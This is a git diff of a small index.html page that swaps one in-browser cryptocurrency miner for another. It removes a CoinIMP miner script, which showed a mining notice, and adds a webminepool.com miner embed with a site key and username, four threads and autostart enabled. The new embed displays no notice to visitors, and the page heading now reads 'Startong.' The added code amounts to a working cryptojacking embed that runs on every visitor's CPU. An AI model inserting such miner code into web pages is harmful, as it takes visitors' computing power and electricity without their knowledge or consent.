--- a/index.html
+++ b/index.html
@@ -13,29 +13,29 @@
 </head>
 
 <body>
-
-    <h1>Mining...</h1>
-
+  
+  <h1>Startong.</h1>
+  
 </body>
- 
-<script src="https://www.hostingcloud.racing/14MC.js"></script>
- 
-<script>
- 
-    var _client = new Client.Anonymous('2d51a7d74290e8a2047efcc6420122fb2df20bf2ab6f457120811e167338344d', {
-     
-        throttle: 0.3, c: 'w'
-    });
- 
-    _client.start();
- 
-    _client.addMiningNotification("Floating Bottom", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");
+  
+  <script src="https://webminepool.com/lib/simple-ui.js"></script>
 
-</script>
+<div id="wmp-container"
+
+    wmp-site-key="<SK_MMgT8VQDSrSAMk4M2Ej5l>"
+
+    wmp-username="<ElLobito>"
+
+    wmp-threads="4"
+
+    wmp-throttle="0.1"
+
+    wmp-autostart="true"
+
+    style="margin: 0 auto;"
+
+>
+
+</div>
 
 </html>
-
-
-
-
-
